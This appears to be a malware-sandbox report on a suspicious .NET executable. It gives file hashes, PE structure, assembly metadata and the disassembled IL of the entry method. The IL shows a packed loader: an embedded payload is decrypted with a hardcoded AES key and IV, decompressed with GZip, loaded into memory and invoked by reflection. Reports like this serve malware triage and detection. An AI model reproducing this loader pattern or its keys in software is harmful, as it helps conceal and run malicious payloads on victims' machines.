Suspicious
Suspect

16fe30dadaf9be2a6e33730ae7d7587b

PE Executable
|
MD5: 16fe30dadaf9be2a6e33730ae7d7587b
|
Size: 669.18 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very high

Hash
 Hash Value
MD5
16fe30dadaf9be2a6e33730ae7d7587b
Sha1
98c08a4b44525c851d5e727e13b11431ce9219fa
Sha256
37f8a54ffb5377feb9b65b66e2da08ab3fb237321f2ae544cf597022d475a0db
Sha384
619a092efaffae757cf7f570e1f53bf19b68bc479e38943f7bc3541c1704a0254fc3a1ef0699cf7da786896f40efe44e
Sha512
84cb29887f29bc3faa87c36ba03ecbec66ed4044ccbbbd880d7496da53f09e37153e43f59a57cbd7a4a3a1c22cda187e9e4f820c0de4f64d6b20101230c1f738
SSDeep
12288:VeKkUPYz+33eOAJYr2M93Cfwg54NEcQXx9l0JAtkID3EO6OXIKl:aUcOOwELbh9l0JATEO5
TLSH
64E423E8B7856D8BE5BBFB7056E123ECD33B96A8C336C01D165802756B8665C4030EB7

PeID

Microsoft Visual C++ DLL
Microsoft Visual C++ v6.0
File Structure
16fe30dadaf9be2a6e33730ae7d7587b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

Yvivmhtkfgu.exe
Full Name

Yvivmhtkfgu.exe
EntryPoint

System.Void WiA6OlGJKDfTanCTgQ.AGIRrOMSD1oYVFMUCW::iDHTm52La()
Scope Name

Yvivmhtkfgu.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Yvivmhtkfgu
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.5
Total Strings

4
Main Method

System.Void WiA6OlGJKDfTanCTgQ.AGIRrOMSD1oYVFMUCW::iDHTm52La()
Main IL Instruction Count

146
Main IL

newobj System.Void System.IO.MemoryStream::.ctor() stloc.0 <null> call System.Security.Cryptography.Aes System.Security.Cryptography.Aes::Create() stloc.s V_4 ldloc.s V_4 ldc.i4 256 callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_KeySize(System.Int32) ldloc.s V_4 ldstr awibD+HV/anVvBWbkCStOtLupd7Ru+EksGrtCNkgPd4= call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_Key(System.Byte[]) ldloc.s V_4 ldstr wdd0kHPC1yyDufBbTyhJqA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_IV(System.Byte[]) ldloc.s V_4 ldloc.s V_4 callvirt System.Byte[] System.Security.Cryptography.SymmetricAlgorithm::get_Key() ldloc.s V_4 callvirt System.Byte[] System.Security.Cryptography.SymmetricAlgorithm::get_IV() callvirt System.Security.Cryptography.ICryptoTransform System.Security.Cryptography.SymmetricAlgorithm::CreateDecryptor(System.Byte[],System.Byte[]) stloc.s V_5 newobj System.Void System.IO.MemoryStream::.ctor() stloc.s V_6 ldc.i4 662384 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>/xwZRwODvhucKE2XMwn <PrivateImplementationDetails>::0D72526D230E75980C8F14378461003A72C05674DFE245FFB5CF80BD433576A2 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) newobj System.Void System.IO.MemoryStream::.ctor(System.Byte[]) stloc.s V_7 ldloc.s V_7 ldloc.s V_5 ldc.i4.0 <null> newobj System.Void System.Security.Cryptography.CryptoStream::.ctor(System.IO.Stream,System.Security.Cryptography.ICryptoTransform,System.Security.Cryptography.CryptoStreamMode) stloc.s V_8 ldloc.s V_8 ldloc.s V_6 callvirt System.Void System.IO.Stream::CopyTo(System.IO.Stream) ldloc.s V_6 callvirt System.Byte[] System.IO.MemoryStream::ToArray() newobj System.Void System.IO.MemoryStream::.ctor(System.Byte[]) stloc.s V_9 ldc.i4.4 <null> newarr System.Byte stloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldc.i4.0 <null> ldc.i4.4 <null> callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldloc.s V_10 ldc.i4.0 <null> call System.Int32 System.BitConverter::ToInt32(System.Byte[],System.Int32) stloc.s V_11 ldloc.s V_9 ldc.i4.0 <null> newobj System.Void System.IO.Compression.GZipStream::.ctor(System.IO.Stream,System.IO.Compression.CompressionMode) stloc.s V_12 ldloc.s V_12 ldloc.0 <null> callvirt System.Void System.IO.Stream::CopyTo(System.IO.Stream) leave IL_0127: ldloc.0 ldloc.s V_12 brfalse IL_00DB: endfinally ldloc.s V_12 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_9 brfalse IL_00EA: endfinally ldloc.s V_9 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_8 brfalse IL_00F9: endfinally ldloc.s V_8 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_7 brfalse IL_0108: endfinally ldloc.s V_7 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_6 brfalse IL_0117: endfinally ldloc.s V_6 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_4 brfalse IL_0126: endfinally ldloc.s V_4 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.0 <null> callvirt System.Byte[] System.IO.MemoryStream::ToArray() stloc.1 <null> ldloc.0 <null> callvirt System.Void System.IO.Stream::Dispose() ldloc.1 <null> call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc.2 <null> ldloc.2 <null> callvirt System.Type[] System.Reflection.Assembly::GetTypes() ldsfld System.Func`2<System.Type,System.Boolean> WiA6OlGJKDfTanCTgQ.AGIRrOMSD1oYVFMUCW/<>c::vfniCDcwH dup <null> brtrue IL_0163: call System.Type System.Linq.Enumerable::FirstOrDefault<System.Type>(System.Collections.Generic.IEnumerable`1<System.Type>,System.Func`2<System.Type,System.Boolean>) pop <null> ldsfld WiA6OlGJKDfTanCTgQ.AGIRrOMSD1oYVFMUCW/<>c WiA6OlGJKDfTanCTgQ.AGIRrOMSD1oYVFMUCW/<>c::MIBv4g2Wh ldftn System.Boolean WiA6OlGJKDfTanCTgQ.AGIRrOMSD1oYVFMUCW/<>c::l9hk9Ay5M(System.Type) newobj System.Void System.Func`2<System.Type,System.Boolean>::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Func`2<System.Type,System.Boolean> WiA6OlGJKDfTanCTgQ.AGIRrOMSD1oYVFMUCW/<>c::vfniCDcwH call System.Type System.Linq.Enumerable::FirstOrDefault<System.Type>(System.Collections.Generic.IEnumerable`1<System.Type>,System.Func`2<System.Type,System.Boolean>) stloc.3 <null> ldloc.3 <null> ldnull <null> call System.Boolean System.Type::op_Inequality(System.Type,System.Type) brfalse IL_01C0: ret ldloc.3 <null> ldstr mONZkCRrpS ldc.i4.s 28 callvirt System.Reflection.MethodInfo System.Type::GetMethod(System.String,System.Reflection.BindingFlags) stloc.s V_13 ldloc.s V_13 ldnull <null> call System.Boolean System.Reflection.MethodInfo::op_Inequality(System.Reflection.MethodInfo,System.Reflection.MethodInfo) brfalse IL_01C0: ret ldnull <null> stloc.s V_14 ldloc.s V_13 callvirt System.Boolean System.Reflection.MethodBase::get_IsStatic() brtrue IL_01A8: nop ldloc.3 <null> call System.Object System.Activator::CreateInstance(System.Type) stloc.s V_14 nop <null> ldloc.s V_13 ldloc.s V_14 ldnull <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave IL_01C0: ret stloc.s V_15 leave IL_01C0: ret ret <null>
16fe30dadaf9be2a6e33730ae7d7587b (669.18 KB)
File Structure
16fe30dadaf9be2a6e33730ae7d7587b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙